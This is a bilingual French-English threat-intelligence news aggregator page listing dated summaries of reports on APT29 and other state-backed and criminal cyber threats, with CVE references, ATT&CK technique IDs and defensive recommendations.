What's new arround internet
| Src | Date (GMT) | Titre | Description | Tags | Stories | Notes |
 |
2025-02-11 20:00:00 | Cybercrime: A Multifaceted National Security Threat (lien direct) | Executive Summary Cybercrime makes up a majority of the malicious activity online and occupies the majority of defenders\' resources. In 2024, Mandiant Consulting responded to almost four times more intrusions conducted by financially motivated actors than state-backed intrusions. Despite this overwhelming volume, cybercrime receives much less attention from national security practitioners than the threat from state-backed groups. While the threat from state-backed hacking is rightly understood to be severe, it should not be evaluated in isolation from financially motivated intrusions. A hospital disrupted by a state-backed group using a wiper and a hospital disrupted by a financially motivated group using ransomware have the same impact on patient care. Likewise, sensitive data stolen from an organization and posted on a data leak site can be exploited by an adversary in the same way data exfiltrated in an espionage operation can be. These examples are particularly salient today, as criminals increasingly target and leak data from hospitals. Healthcare\'s share of posts on data leak sites has doubled over the past three years, even as the number of data leak sites tracked by Google Threat Intelligence Group has increased by nearly 50% year over year. The impact of these attacks mean that they must be taken seriously as a national security threat, no matter the motivation of the actors behind it. Cybercrime also facilitates state-backed hacking by allowing states to purchase cyber capabilities, or co-opt criminals to conduct state-directed operations to steal data or engage in disruption. Russia has drawn on criminal capabilities to fuel the cyber support to their war in Ukraine. GRU-linked APT44 (aka Sandworm), a unit of Russian military intelligence, has employed malware available from cybercrime communities to conduct espionage and disruptive operations in Ukraine and CIGAR (aka RomCom), a group that historically focused on cybercrime, has conducted espionage operations against the Ukrainian government since 2022. However, this is not limited to Russia. Iranian threat groups deploy ransomware to raise funds while simultaneously conducting espionage, and Chinese espionage groups often supplement their income with cybercrime. Most notably, North Korea uses state-backed groups to directly generate revenue for the regime. North Korea has heavily targeted cryptocurrencies, compromising exchanges and individual victims\' crypto wallets. Despite the overlaps in effects and collaboration with states, tackling the root causes of cybercrime requires fundamentally different solutions. Cybercrime involves collaboration between disparate groups often across borders and without respect to sovereignty. Any solution requires international cooperation by both law enforcement and intelligence agencies to track, arrest, and prosecute these criminals. Individual takedowns can have important temporary effects, but the collaborative nature of cybercrime means that the disrupted group will be quickly replaced by others offering the same service. Achieving broader success will require collaboration between countries and public and private sectors on systemic solutions such as increasing education and resilience efforts. aside_block | Ransomware Malware Tool Vulnerability Threat Legislation Medical Cloud Technical | APT 41 APT 38 APT 29 APT 43 APT 44 | ★★★ |
 |
2024-10-14 21:26:20 | Faits saillants hebdomadaires, 14 octobre 2024 Weekly OSINT Highlights, 14 October 2024 (lien direct) |
## Snapshot Last week\'s OSINT reporting highlights a complex landscape of cyber threats with a focus on APT groups, sophisticated malware, and exploitation of vulnerabilities. Many attacks are espionage-focused, with China-aligned groups like CeranaKeeper, Iran\'s Hazel Sandstorm, and Russia\'s Midnight Blizzard (SVR) leveraging spearphishing and vulnerability exploitation for intelligence gathering. Ransomware also remains a dominant attack type, with threat actors leveraging double extortion tactics to maximize pressure on victims. A surge in reporting on malware distribution was also observed, including Lua-based malware in the education sector and Pronsis Loader delivering Lumma Stealer. Additionally, multiple reports detail widespread campaigns leveraging phishing, malvertising, and cryptomining, with key targets being government institutions, financial services, and critical infrastructure. Attackers employ diverse techniques such as DNS tunneling, USB-based malware, and exploit known vulnerabilities like EternalBlue (CVE-2017-0144) and FortiOS (CVE-2024-23113). ## Description Last week\'s OSINT reporting highlights a complex landscape of cyber threats with a focus on APT groups, sophisticated malware, and exploitation of vulnerabilities. Many attacks are espionage-focused, with China-aligned groups like CeranaKeeper, Iran\'s Hazel Sandstorm, and Russia\'s Midnight Blizzard (SVR) leveraging spearphishing and vulnerability exploitation for intelligence gathering. Ransomware also remains a dominant attack type, with threat actors leveraging double extortion tactics to maximize pressure on victims. A surge in reporting on malware distribution was also observed, including Lua-based malware in the education sector and Pronsis Loader delivering Lumma Stealer. Additionally, multiple reports detail widespread campaigns leveraging phishing, malvertising, and cryptomining, with key targets being government institutions, financial services, and critical infrastructure. Attackers employ diverse techniques such as DNS tunneling, USB-based malware, and exploit known vulnerabilities like EternalBlue (CVE-2017-0144) and FortiOS (CVE-2024-23113). 1. [CeranaKeeper Targets Thai Government](https://sip.security.microsoft.com/intel-explorer/articles/b3aa72ef): ESET uncovered a new China-aligned APT, CeranaKeeper, targeting government institutions in Thailand, using unique tools for data exfiltration via cloud services. The group adapts its malware for stealth and has been mistakenly linked to Mustang Panda due to some shared methods. 2. [Largest DDoS Attack Mitigated](https://sip.security.microsoft.com/intel-explorer/articles/74f06d55): Cloudflare mitigated the largest publicly disclosed DDoS attack, peaking at 3.8 Tbps, which targeted financial services, internet, and telecom organizations globally. Akamai also identified a critical vulnerability in CUPS servers, potentially creating a new vector for DDoS amplification. 3. [Cuckoo Spear\'s Sophisticated Tools](https://sip.security.microsoft.com/intel-explorer/articles/d47fc595): Cybereason exposed the Cuckoo Spear campaign by APT10, using NOOPLDR and NOOPDOOR to conduct espionage against Japanese industries and governments. These advanced tools employ anti-detection techniques and facilitate network pivoting for exfiltration. 4. [Mamba 2FA Phishing Campaign](https://sip.security.microsoft.com/intel-explorer/articles/bfcb80ed): Sekoia identified a phishing campaign using Mamba 2FA, a PhaaS platform, to steal credentials and session cookies from Microsoft services. Attackers exploited MFA weaknesses and used Telegram bots for data exfiltration. 5. [Golden Jackal\'s Air-Gapped System Attacks](https://sip.security.microsoft.com/intel-explorer/articles/f0234a25): ESET researchers discovered Golden Jackal targeting European government organizations with tools designed to breach air-gapped systems. The group uses USB-based malware for espionage and data exfiltration. 6. [Awaken Likho Targets Russian Agencies](https://sip.security.microsoft.com/in | Ransomware Malware Tool Vulnerability Threat Patching Industrial Medical Cloud | APT 29 APT 10 GoldenJackal | ★★ |
|
2024-10-11 00:28:23 | Mise à jour sur les opérations de cyber et des exploitations de vulnérabilité SVR Update on SVR Cyber Operations and Vulnerability Exploitations (lien direct) |
#### Targeted Industries - Government Agencies & Services - Information Technology - Financial Services ## Snapshot Russia\'s Foreign Intelligence Service (SVR), also tracked as [Midnight Blizzard](https://sip.security.microsoft.com/intel-profiles/d825313b053efea45228ff1f4cb17c8b5433dcd2f86353e28be2d484ce874616) or APT29, has persistently targeted global entities in defense, technology, and finance sectors to gather intelligence and support cyber operations, including those related to the invasion of Ukraine. The U.S. and U.K. cyber agencies, including the NSA, FBI, U.S. Cyber Command\'s Cyber National Mission Force, and the U.K.\'s NCSC, have issued a joint advisory warning network defenders of these ongoing attacks. ## Description SVR actors exploit vulnerabilities for initial access, use techniques such as spearphishing and password spraying, and rely on obfuscation methods, including The Onion Router (TOR) network and proxies, to evade detection. The group\'s tactics, techniques, and procedures (TTPs) highlight a focus on exploiting known vulnerabilities, particularly through unpatched systems and weak authentication measures. For initial access, the actors leverage vulnerabilities like [CVE-2022-27924](https://sip.security.microsoft.com/intel-explorer/cves/CVE-2022-27924/) (Zimbra mail server) and [CVE-2023-42793](https://sip.security.microsoft.com/intel-profiles/CVE-2023-42793) (JetBrains TeamCity), allowing them to bypass authentication and execute arbitrary code. These vulnerabilities enable access to credentials, emails, and other sensitive data without victim interaction. Furthermore, SVR cyber actors engage in mass scanning to identify exposed systems and prioritize targets based on opportunity, often using compromised systems as infrastructure for subsequent attacks or as a launchpad for deeper network compromises. SVR also employs a range of techniques to maintain persistence and escalate privileges in victim networks. These include spearphishing via platforms like Microsoft Teams, where they impersonate technical support to gain account access, and password spraying to infiltrate poorly secured accounts. Once inside a network, SVR actors utilize living-off-the-land techniques, leveraging existing tools and software to blend into normal operations and evade detection. They also frequently lease infrastructure through resellers, relying on compromised accounts to maintain anonymity. In cases where detection is suspected, they act swiftly to destroy infrastructure and erase evidence, demonstrating a sophisticated approach to operational security. ## Microsoft Analysis Midnight Blizzard (NOBELIUM) is known to primarily target governments, diplomatic entities, NGOs, and IT service providers in primarily the United States and Europe. Their focus is to collect intelligence through longstanding and dedicated espionage of foreign interests that can be traced to early 2018 by leveraging the use of identity. Midnight Blizzard (NOBELIUM) is consistent and persistent in their operational targeting and their objectives rarely change. They utilize diverse initial access methods ranging from stolen credentials to supply chain attacks, exploitation of on-premises environments to laterally move to the cloud, exploitation of service providers\' trust chain to gain access to downstream customers, and the Active Directory Federation Services (ADFS) malware known as FOGGYWEB and MAGICWEB. Midnight Blizzard is tracked by partner security companies as APT29, UNC2452, and Cozy Bear. ## Recommendations Microsoft recommends the following mitigations to reduce the impact of this threat. Check the recommendations card for the deployment status of monitored mitigations. While multi-factor authentication (MFA) has largely reduced the number of compromised organizations, threat actors like Midnight Blizzard constantly seek new ways to circumvent this barrier. Piloting and deploying [phishing-resistant authentication methods](https://l | Malware Tool Vulnerability Threat Cloud Technical | APT 29 | ★★★ |
|
2024-09-09 11:04:46 | Faits saillants hebdomadaires OSINT, 9 septembre 2024 Weekly OSINT Highlights, 9 September 2024 (lien direct) |
## Snapshot Last week\'s OSINT reporting highlights a broad spectrum of cyber threats with notable trends in malware campaigns, espionage, and ransomware attacks. Phishing remains a dominant attack vector, delivering a variety of payloads like custom backdoors, infostealers, and ransomware. Nation-state actors such as Russia\'s APT29 (Midnight Blizzard) and China\'s Earth Lusca were prominent, focusing on espionage and targeting specific regions like East Asia and the Middle East. Other notable threats included the use of deepfakes for scam campaigns and the exploitation of unpatched vulnerabilities in widely used software like Microsoft Office and WPS Office. The targeting of organizations ranged from government entities to private sector businesses, with some attacks focusing on specific industries like finance, healthcare, and technology. ## Description 1. [Unique Malware Campaign \'Voldemort\'](https://sip.security.microsoft.com/intel-explorer/articles/3cc65ab7): Proofpoint researchers uncovered a phishing campaign distributing custom malware via emails impersonating tax authorities across multiple countries. The malware, likely motivated by espionage, uses advanced techniques like abusing Google Sheets for command-and-control (C2) to avoid detection. 2. [Python-Based Infostealer \'Emansrepo\'](https://sip.security.microsoft.com/intel-explorer/articles/94d41800): FortiGuard Labs identified Emansrepo, a Python-based infostealer targeting browser data and files via phishing emails. The malware has evolved into a sophisticated multi-stage tool, expanding its capabilities to steal sensitive data like cryptocurrency wallets. 3. [Deepfake Scams Using Public Figures](https://sip.security.microsoft.com/intel-explorer/articles/6c6367c7): Palo Alto Networks researchers discovered deepfake scams impersonating public figures to promote fake investment schemes. These scams, involving a single threat actor group, target global audiences with AI-generated videos hosted on domains with significant traffic. 4. [Zero-Day Vulnerabilities in WPS Office](https://sip.security.microsoft.com/intel-explorer/articles/f897577d): ESET researchers identified two zero-day vulnerabilities in Kingsoft WPS Office exploited by the APT-C-60 group. The vulnerabilities allowed attackers to execute arbitrary code in targeted East Asian countries, using malicious documents to deliver a custom backdoor. 5. [KTLVdoor Malware Campaign](https://sip.security.microsoft.com/intel-explorer/articles/222628fc): Trend Micro uncovered KTLVdoor, a highly obfuscated backdoor developed by Earth Lusca, targeting Windows and Linux systems. The malware allows attackers to fully control infected systems and is primarily linked to Chinese-speaking actors. 6. [Fake Palo Alto GlobalProtect Tool](https://sip.security.microsoft.com/intel-explorer/articles/22951902): Trend Micro identified a campaign targeting Middle Eastern organizations with a fake version of Palo Alto GlobalProtect. The malware executes remote PowerShell commands and exfiltrates files while masquerading as a legitimate security solution. 7. [APT29 Targets Mongolian Government Websites](https://sip.security.microsoft.com/intel-explorer/articles/12b5ac31): Google TAG discovered that Russian APT29 used iOS and Chrome exploits to target Mongolian government websites. The attack, linked to commercial surveillance vendors, involved watering hole attacks to steal authentication cookies from targeted users. 8. [MacroPack-Abused Malicious Documents](https://sip.security.microsoft.com/intel-explorer/articles/cd8dec3b): Cisco Talos found malicious documents leveraging MacroPack to deliver payloads like Havoc and PhantomCore RAT. These documents used obfuscated macros and lures in multiple languages, complicating attribution to any single threat actor. 9. [Underground Ransomware by RomCom Group](https://sip.security.microsoft.com/intel-explorer/articles/e2a44c7c): FortiGuard Labs identified the Underground ransomware targeting Windows systems, deployed by the Russia-based RomCom | Ransomware Malware Tool Vulnerability Threat Prediction Medical Commercial | APT 38 APT 29 | ★★ |
|
2024-09-04 02:45:48 | Les attaquants soutenus par l'État et les vendeurs de surveillance commerciale utilisent à plusieurs reprises les mêmes exploits State-backed attackers and commercial surveillance vendors repeatedly use the same exploits (lien direct) |
## Snapshot Google\'s Threat Analysis Group (TAG) uncovered in-the-wild exploit campaigns targeting Mongolian government websites between November 2023 and July 2024. TAG attributes the attack to the Russian government-backed actor APT29, tracked by Microsoft as [Midnight Blizzard](https://sip.security.microsoft.com/intel-profiles/d825313b053efea45228ff1f4cb17c8b5433dcd2f86353e28be2d484ce874616). The attackers utilized exploits similar to those used by commercial surveillance vendors Intellexa and NSO Group. ## Description These campaigns delivered n-day exploits for iOS and Chrome, affecting unpatched devices. The initial infection vector was a watering hole attack on compromised websites that delivered iOS WebKit and Chrome exploits. The iOS campaigns delivered an exploit via [CVE-2023-41993](https://sip.security.microsoft.com/intel-explorer/cves/CVE-2023-41993/) targeting iPhone users running older versions. TAG\'s analysis revealed that the exploit is nearly identical to one used by commercial vendor Intellexa. This exploit loaded the same cookie stealer framework that TAG observed in March 2021, when a Russian state-backed attacker exploited [CVE-2021-1879](https://sip.security.microsoft.com/intel-explorer/cves/CVE-2021-1879/) to steal authentication cookies from major sites like LinkedIn, Gmail, and Facebook. Read more [here](https://sip.security.microsoft.com/intel-explorer/articles/4a4ab0bf)about Microsoft\'s coverage of Midnight Blizzard\'s malicious activity exploiting CVE-2021-1879. TAG also discovered a Google Chrome exploit chain that aimed to steal credential cookies from Android users. Similar to the iOS campaigns, this attack began with initial access gained through a watering hole. This attack chain exploited [CVE-2024-5274](http://CVE-2024-5274) to compromise the renderer - an exploit that Chrome Security previously discovered as an in-the-wild 0-day in May 2024 used by the commercial NSO Group. Additionally, the attackers leveraged [CVE-2024-4671](https://sip.security.microsoft.com/intel-explorer/cves/CVE-2024-4671/) to break out of Chrome site isolation. TAG is uncertain how suspected APT29 actors acquired the exploits used by commercial surveillance vendors. ### Additional Analysis Commercial surveillance vendors, including Intellexa and the NSO Group, have been the subject of significant scrutiny and criticism. These companies develop and sell advanced spyware tools to governments and law enforcement agencies for surveillance purposes. However, their products have been linked to unauthorized surveillance activities and [human rights concerns](https://www.siliconrepublic.com/enterprise/amnesty-international-intellexa-ireland-predator-spyware "https://www.siliconrepublic.com/enterprise/amnesty-international-intellexa-ireland-predator-spyware"). The NSO Group, known for its [Pegasus spyware](https://thehill.com/policy/cybersecurity/4053311-khashoggi-widow-suing-israeli-firm-says-spyware-caused-her-to-constantly-be-looking-over-her-shoulder/ "https://thehill.com/policy/cybersecurity/4053311-khashoggi-widow-suing-israeli-firm-says-spyware-caused-her-to-constantly-be-looking-over-her-shoulder/"), has faced criticism for its involvement in illegal surveillance. Similarly, Intellexa has been implicated in scandals involving the use of its Predator spyware to monitor U.S. officials, journalists, and policy experts. Both companies have been [sanctioned](https://www.icij.org/investigations/cyprus-confidential/spyware-firm-intellexa-hit-with-us-sanctions-after-cyprus-confidential-expose/ "https://www.icij.org/investigations/cyprus-confidential/spyware-firm-intellexa-hit-with-us-sanctions-after-cyprus-confidential-expose/") for their roles in distributing spyware to authoritarian regimes ## Recommendations Strengthen operating environment configuration - Keep operating systems and applications up to date. Apply security patches as soon as possible. Ensure that Google Chrome web browser is updated at version [128.0.6613.84](https://ch | Malware Tool Vulnerability Threat Legislation Mobile Commercial | APT 29 | ★★ |
|
2024-07-08 14:00:00 | Enhardi et évolutif: un instantané des cyber-menaces auxquelles l'OTAN est confrontée à l'OTAN Emboldened and Evolving: A Snapshot of Cyber Threats Facing NATO (lien direct) |
Written by: John Hultquist
As North Atlantic Treaty Organization (NATO) members and partners gather for a historic summit, it is important to take stock of one of its most pressing challenges-the cyber threat. The Alliance faces a barrage of malicious cyber activity from all over the globe, carried out by emboldened state-sponsored actors, hacktivists, and criminals who are willing to cross lines and carry out activity that was previously considered unlikely or inconceivable. In addition to military targets, NATO must consider the risks that hybrid threats like malicious cyber activity pose to hospitals, civil society, and other targets, which could impact resilience in a contingency. The war in Ukraine is undoubtedly linked to escalating cyber threat activity, but many of these threats will continue to grow separately and in parallel. NATO must contend with covert, aggressive malicious cyber actors that are seeking to gather intelligence, preparing to or currently attacking critical infrastructure, and working to undermine the Alliance with elaborate disinformation schemes. In order to protect its customers and clients, Google is closely tracking cyber threats, including those highlighted in this report; however, this is just a glimpse at a much larger and evolving landscape. Cyber Espionage NATO\'s adversaries have long sought to leverage cyber espionage to develop insight into the political, diplomatic, and military disposition of the Alliance and to steal its defense technologies and economic secrets. However, intelligence on the Alliance in the coming months will be of heightened importance. This year\'s summit is a transition period, with the appointment of Mark Rutte as the new Secretary General and a number of adaptations expected to be rolled out to shore up the Alliance\'s defense posture and its long-term support for Ukraine. Successful cyber espionage from threat actors could potentially undermine the Alliance\'s strategic advantage and inform adversary leadership on how to anticipate and counteract NATO\'s initiatives and investments. NATO is targeted by cyber espionage activity from actors around the world with varying capabilities. Many still rely on technically simple but operationally effective methods, like social engineering. Others have evolved and elevated their tradecraft to levels that distinguish themselves as formidable adversaries for even the most experienced defenders. APT29 (ICECAP) Publicly attributed to the Russian Foreign Intelligence Services (SVR) by several governments, APT29 is heavily focused on diplomatic and political intelligence collection, principally targeting Europe and NATO member states. APT29 has been involved in multiple high-profile breaches of technology firms that were designed to provide access to the public sector. In the past year, Mandiant has observed APT29 targeting technology companies and IT service providers in NATO member countries to facilitate third-party and software supply chain compromises of government and poli |
Ransomware Malware Tool Vulnerability Threat Legislation Medical Cloud Technical | APT 29 APT 28 | ★★★ |
|
2024-04-25 10:00:00 | Pole Voûte: cyber-menaces aux élections mondiales Poll Vaulting: Cyber Threats to Global Elections (lien direct) |
Written by: Kelli Vanderlee, Jamie Collier
Executive Summary The election cybersecurity landscape globally is characterized by a diversity of targets, tactics, and threats. Elections attract threat activity from a variety of threat actors including: state-sponsored actors, cyber criminals, hacktivists, insiders, and information operations as-a-service entities. Mandiant assesses with high confidence that state-sponsored actors pose the most serious cybersecurity risk to elections. Operations targeting election-related infrastructure can combine cyber intrusion activity, disruptive and destructive capabilities, and information operations, which include elements of public-facing advertisement and amplification of threat activity claims. Successful targeting does not automatically translate to high impact. Many threat actors have struggled to influence or achieve significant effects, despite their best efforts. When we look across the globe we find that the attack surface of an election involves a wide variety of entities beyond voting machines and voter registries. In fact, our observations of past cycles indicate that cyber operations target the major players involved in campaigning, political parties, news and social media more frequently than actual election infrastructure. Securing elections requires a comprehensive understanding of many types of threats and tactics, from distributed denial of service (DDoS) to data theft to deepfakes, that are likely to impact elections in 2024. It is vital to understand the variety of relevant threat vectors and how they relate, and to ensure mitigation strategies are in place to address the full scope of potential activity. Election organizations should consider steps to harden infrastructure against common attacks, and utilize account security tools such as Google\'s Advanced Protection Program to protect high-risk accounts. Introduction The 2024 global election cybersecurity landscape is characterized by a diversity of targets, tactics, and threats. An expansive ecosystem of systems, administrators, campaign infrastructure, and public communications venues must be secured against a diverse array of operators and methods. Any election cybersecurity strategy should begin with a survey of the threat landscape to build a more proactive and tailored security posture. The cybersecurity community must keep pace as more than two billion voters are expected to head to the polls in 2024. With elections in more than an estimated 50 countries, there is an opportunity to dynamically track how threats to democracy evolve. Understanding how threats are targeting one country will enable us to better anticipate and prepare for upcoming elections globally. At the same time, we must also appreciate the unique context of different countries. Election threats to South Africa, India, and the United States will inevitably differ in some regard. In either case, there is an opportunity for us to prepare with the advantage of intelligence. |
Ransomware Malware Hack Tool Vulnerability Threat Legislation Cloud Technical | APT 40 APT 29 APT 28 APT 43 APT 31 APT 42 | ★★★ |
 |
2023-12-14 15:30:00 | Les pirates d'ours confortables ciblent les serveurs TeamCity JetBrains dans Global Campaign Cozy Bear Hackers Target JetBrains TeamCity Servers in Global Campaign (lien direct) |
Le FBI et la CISA ont détecté que les pirates liés au service de renseignement étranger russe (SVR) visent une vulnérabilité de JetBrains TeamCity depuis septembre 2023
The FBI and CISA detected that hackers linked to the Russian foreign intelligence service (SVR) have been targeting a JetBrains TeamCity vulnerability since September 2023 |
Vulnerability | APT 29 | ★★★ |
 |
2023-11-19 11:14:25 | Les pirates russes utilisent la fonctionnalité Ngrok et l'exploit Winrar pour attaquer les ambassades Russian hackers use Ngrok feature and WinRAR exploit to attack embassies (lien direct) |
Après Sandworm et APT28 (connu sous le nom de Fancy Bear), un autre groupe de pirates russes parrainé par l'État, APT29, tire parti de la vulnérabilité CVE-2023-38831 dans Winrar pour les cyberattaques.[...]
After Sandworm and APT28 (known as Fancy Bear), another state-sponsored Russian hacker group, APT29, is leveraging the CVE-2023-38831 vulnerability in WinRAR for cyberattacks. [...] |
Vulnerability Threat | APT 29 APT 28 | ★★★ |
 |
2022-08-30 15:01:00 | Anomali Cyber Watch: First Real-Life Video-Spoofing Attack, MagicWeb Backdoors via Non-Standard Key Identifier, LockBit Ransomware Blames Victim for DDoSing Back, and More (lien direct) | The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: Authentication, DDoS, Fingerprinting, Iran, North Korea, Ransomware, and Russia. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
LastPass Hackers Stole Source Code
(published: August 26, 2022)
In August 2022, an unidentified threat actor gained access to portions of the password management giant LastPass development environment. LastPass informed that it happened through a single compromised developer account and the attacker took portions of source code and some proprietary LastPass technical information. The company claims that this incident did not affect customer data or encrypted password vaults.
Analyst Comment: This incident doesn’t seem to have an immediate impact on LastPass users. Still, organizations relying on LastPass should raise the concern in their risk assessment since “white-box hacking” (when source code of the attacking system is known) is easier for threat actors. Organizations providing public-facing software should take maximum measures to block threat actors from their development environment and establish robust and transparent security protocols and practices with all third parties involved in their code development.
Tags: LastPass, Password manager, Data breach, Source code
Mercury Leveraging Log4j 2 Vulnerabilities in Unpatched Systems to Target Israeli
(published: August 25, 2022)
Starting in July 2022, a new campaign by Iran-sponsored group Static Kitten (Mercury, MuddyWater) was detected targeting Israeli organizations. Microsoft researchers detected that this campaign was leveraging exploitation of Log4j 2 vulnerabilities (CVE-2021-45046 and CVE-2021-44228) in SysAid applications (IT management tools). For persistence Static Kitten was dropping webshells, creating local administrator accounts, stealing credentials, and adding their tools in the startup folders and autostart extensibility point (ASEP) registry keys. Overall the group was heavily using various open-source and built-in operating system tools: eHorus remote management software, Ligolo reverse tunneling tool, Mimikatz credential theft tool, PowerShell programs, RemCom remote service, Venom proxy tool, and Windows Management Instrumentation (WMI).
Analyst Comment: Network defenders should monitor for alerts related to web shell threats, suspicious RDP sessions, ASEP registry anomaly, and suspicious account creation. Similarly, SysAid users can monitor for webshells and abnormal processes related to SysAisServer instance. Even though Static Kitten was observed leveraging the Log4Shell vulnerabilities in the past (targeting VMware apps), most of their attacks still start with spearphishing, often from a compromised email account.
MITRE ATT&CK: [MITRE ATT&CK] Exploit Public-Facing Application - T1190 | [MITRE ATT&CK] OS Credential Dumping - T1003 | [MITRE ATT&CK] Phishing - T1566 | |
Ransomware Hack Tool Vulnerability Threat Guideline Cloud | APT 37 APT 29 LastPass | |
|
2022-07-11 22:59:00 | Anomali Cyber Watch: Brute Ratel C4 Framework Abused to Avoid Detection, OrBit Kernel Malware Patches Linux Loader, Hive Ransomware Gets Rewritten, and More (lien direct) | The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: APT, China, Cyberespionage, India, Malspam, Ransomware, Russia, Spearhishing, and Vulnerabilities. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
Targets of Interest | Russian Organizations Increasingly Under Attack By Chinese APTs
(published: July 7, 2022)
SentinelLabs researchers detected yet another China-sponsored threat group targeting Russia with a cyberespionage campaign. The attacks start with a spearphishing email containing Microsoft Office maldocs built with the Royal Road malicious document builder. These maldocs were dropping the Bisonal backdoor remote access trojan (RAT). Besides targeted Russian organizations, the same attackers continue targeting other countries such as Pakistan. This China-sponsored activity is attributed with medium confidence to Tonto Team (CactusPete, Earth Akhlut).
Analyst Comment: Defense-in-depth (layering of security mechanisms, redundancy, fail-safe defense processes) is the best way to ensure safety from advanced persistent threats (APTs), including a focus on both network and host-based security. Prevention and detection capabilities should also be in place. Furthermore, all employees should be educated on the risks of spearphishing and how to identify such attempts.
MITRE ATT&CK: [MITRE ATT&CK] Phishing - T1566 | [MITRE ATT&CK] User Execution - T1204 | [MITRE ATT&CK] Exploitation for Client Execution - T1203
Tags: China, source-country:CN, Russia, target-country:RU, Ukraine, Pakistan, target-country:PK, Bisonal RAT, Tonto Team, APT, CactusPete, Earth Akhlut, Royal Road, 8.t builder, CVE-2018-0798
OrBit: New Undetected Linux Threat Uses Unique Hijack of Execution Flow
(published: July 6, 2022)
Intezer researchers describe a new Linux malware dubbed OrBit, that was fully undetected at the time of the discovery. This malware hooks functions and adds itself to all running processes, but it doesn’t use LD_PRELOAD as previously described Linux threats. Instead it achieves persistence by adding the path to the malware into the /etc/ld.so.preload and by patching the binary of the loader itself so it will load the malicious shared object. OrBit establishes an SSH connection, then stages and infiltrates stolen credentials. It avoids detection by multiple functions that show running processes or network connections, as it hooks these functions and filters their output.
Analyst Comment: Defenders are advised to use network telemetry to detect anomalous SSH traffic associated with OrBit exfiltration attempts. Consider network segmentation, storing sensitive data offline, and deploying security solutions as statically linked executables.
MITRE ATT&CK: [MITRE ATT&CK] Hijack Execution Flow - T1574 | [MITRE ATT&CK] Hide Artifacts - T1564 | |
Ransomware Malware Tool Vulnerability Threat Patching | APT 29 | |
|
2022-05-10 17:08:00 | Anomali Cyber Watch: Moshen Dragon Abused Anti-Virus Software, Raspberry Robin Worm Jumps from USB, UNC3524 Uses Internet-of-Things to Steal Emails, and More (lien direct) | The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: APT, Cyberespionage, Phishing, Ransomware, Sideloading, and Ukraine. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
Attackers Are Attempting to Exploit Critical F5 BIG-IP RCE
(published: May 9, 2022)
CVE-2022-1388, a critical remote code execution vulnerability affecting F5 BIG-IP multi-purpose networking devices/modules, was made public on May 4, 2022. It is of high severity (CVSSv3 score is 9.8). By May 6, 2022, multiple researchers have developed proof-of concept (PoC) exploits for CVE-2022-1388. The first in-the-wild exploitation attempts were reported on May 8, 2022.
Analyst Comment: Update your vulnerable F5 BIG-IP versions 13.x and higher. BIG-IP 11.x and 12.x will not be fixed, but temporary mitigations available: block iControl REST access through the self IP address and through the management interface, modify the BIG-IP httpd configuration.
MITRE ATT&CK: [MITRE ATT&CK] Exploit Public-Facing Application - T1190
Tags: CVE-2022-1388, F5, Vulnerability, Remote code execution, Missing authentication
Mobile Subscription Trojans and Their Little Tricks
(published: May 6, 2022)
Kaspersky researchers analyzed five Android trojans that are secretly subscribing users to paid services. Jocker trojan operators add malicious code to legitimate apps and re-upload them to Google Store under different names. To avoid detection, malicious functionality won’t start until the trojan checks that it is available in the store. The malicious payload is split in up to four files. It can block or substitute anti-fraud scripts, and modify X-Requested-With header in an HTTP request. Another Android malware involved in subscription fraud, MobOk trojan, has additional functionality to bypass captcha. MobOk was seen in a malicious app in Google Store, but the most common infection vector is being spread by other Trojans such as Triada.
Analyst Comment: Limit your apps to downloads from the official stores (Google Store for Android), avoid new apps with low number of downloads and bad reviews. Pay attention to the terms of use and payment. Avoid granting it too many permissions if those are not crucial to the app alleged function. Monitor your balance and subscription list.
MITRE ATT&CK: [MITRE ATT&CK] Ingress Tool Transfer - T1105 | [MITRE ATT&CK] User Execution - T1204 | [MITRE ATT&CK] Data Manipulation - T1565
Tags: Android, Jocker, MobOk, Triada, Vesub, GriftHorse, Trojan, Subscription fraud, Subscription Trojan, Russia, target-country:RU, Middle East, Saudi Arabia, target-country:SA, Egypt, target-country:EG, Thailand, target-country:TH
Raspberry Robin Gets the Worm Early
(published: May 5, 2022)
Since September 2021, Red Canary researchers monitor Raspberry Robin, a new worm |
Ransomware Malware Tool Vulnerability Threat | APT 29 APT 28 | ★★★ |
|
2022-01-19 22:45:00 | Anomali Cyber Watch: Russia-Sponsored Cyber Threats, China-Based Earth Lusca Active in Cyberespionage and Cybertheft, BlueNoroff Hunts Cryptocurrency-Related Businesses, and More (lien direct) | The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: APT, China, HTTP Stack, Malspam, North Korea, Phishing, Russia and Vulnerabilities. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
Earth Lusca Employs Sophisticated Infrastructure, Varied Tools and Techniques
(published: January 17, 2022)
The Earth Lusca threat group is part of the Winnti cluster. It is one of different Chinese groups that share aspects of their tactics, techniques, and procedures (TTPs) including the use of Winnti malware. Earth Lusca were active throughout 2021 committing both cyberespionage operations against government-connected organizations and financially-motivated intrusions targeting gambling and cryptocurrency-related sectors. For intrusion, the group tries different ways in including: spearphishing, watering hole attacks, and exploiting publicly facing servers. Cobalt Strike is one of the group’s preferred post-exploitation tools. It is followed by the use of the BioPass RAT, the Doraemon backdoor, the FunnySwitch backdoor, ShadowPad, and Winnti. The group employs two separate infrastructure clusters, first one is rented Vultr VPS servers used for command-and-control (C2), second one is compromised web servers used to scan for vulnerabilities, tunnel traffic, and Cobalt Strike C2.
